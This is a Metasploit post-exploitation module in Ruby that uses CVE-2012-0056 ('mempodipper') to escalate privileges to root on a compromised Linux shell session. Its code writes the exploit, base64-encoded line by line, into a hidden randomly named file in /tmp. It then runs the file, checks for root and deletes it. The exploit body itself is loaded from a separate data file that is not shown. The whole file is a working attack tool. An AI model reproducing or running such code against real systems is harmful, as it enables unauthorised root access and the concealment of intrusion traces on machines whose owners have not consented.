### $Id$##### This file is part of the Metasploit Framework and may be

1. ##
2. # $Id$
3. ##
4.  
5. ##
6. # This file is part of the Metasploit Framework and may be subject to
7. # redistribution and commercial restrictions. Please see the Metasploit
8. # Framework web site for more information on licensing and terms of use.
9. # http://metasploit.com/framework/
10. ##
11.  
12. require 'msf/core'
13. require 'rex'
14. require 'msf/core/post/common'
15. require 'msf/core/post/file'
16. require 'msf/core/post/linux/priv'
17. require 'msf/core/post/linux/system'
18.  
19. class Metasploit3 < Msf::Post
20.  
21.     include Msf::Post::Common
22.     include Msf::Post::File
23.     include Msf::Post::Linux::Priv
24.     include Msf::Post::Linux::System
25.  
26.     def initialize(info={})
27.         super( update_info( info,
28.             'Name'          => 'Exploit CVE-2012-0056 to get root',
29.             'Description'   => %q{ This module try elevate your privilages by exploitng CVE-2012-0056},
30.             'License'       => MSF_LICENSE,
31.             'Author'        => [ 'mak' ],
32.             'Version'       => '$Revision$',
33.             'Platform'      => [ 'linux' ],
34.             'SessionTypes'  => [ 'shell' ], ## no mete for now?
35.         ))
36.     end
37.  
38.     def run
39.           print_status("Using cve-2012-56 to elevete privs on session #{session.inspect}...")
40.  
41.           if is_root?
42.             print_status "Already root, so no need to upgrade permissions. Aborting."
43.             return
44.           end
45.  
46.           objdump_bin = cmd_exec("which objdump")
47.           ruby_bin = cmd_exec("which ruby")
48.  
49.           if [objdump_bin,ruby_bin].any? {|x| x.empty?}
50.             print_erorr "This exploit is usless without etiher objdump or ruby on owned machine"
51.             return
52.           end
53.  
54.           sploit_file = "/tmp/." + Rex::Text.rand_text_alpha(8) + '.rb'
55.  
56.           print_status "Coping exploit to #{sploit_file} it may take a while"
57.  
58.           begin
59.             ::Timeout.timeout(240) do
60.  
61.               generate_exploit().split("\n").each  do |l|
62.                 l = Rex::Text.encode_base64(l)
63.                 cmd_exec("echo #{l} | base64 -d >> #{sploit_file} ; echo '' >> #{sploit_file}")
64.               end
65.  
66.               print_status "Lunching exploit..."
67.  
68.               cmd_exec("ruby #{sploit_file}")
69.  
70.  
71.             end
72.           rescue ::Timeout::Error
73.             print_error "mempodipper: failed du to timeout"
74.           rescue
75.             print_error "mempodipper failed. Check the session log."
76.           end
77.  
78.           if is_root?
79.             print_good "Got root. Nice."
80.           else
81.             print_error "Sorry Mempodipper faild."
82.           end
83.  
84.           cmd_exec "rm #{sploit_file}"
85.         end
86.  
87.  
88.         def generate_exploit
89.  
90.           file = ::File.join(Msf::Config.install_root, "data", "exploits", "cve-2012-0056.rb")
91.  
92.           met = ::File.open(file, "rb") {|f|
93.             f.read(f.stat.size)
94.           }
95.  
96.           return met
97.  
98.     end
99. end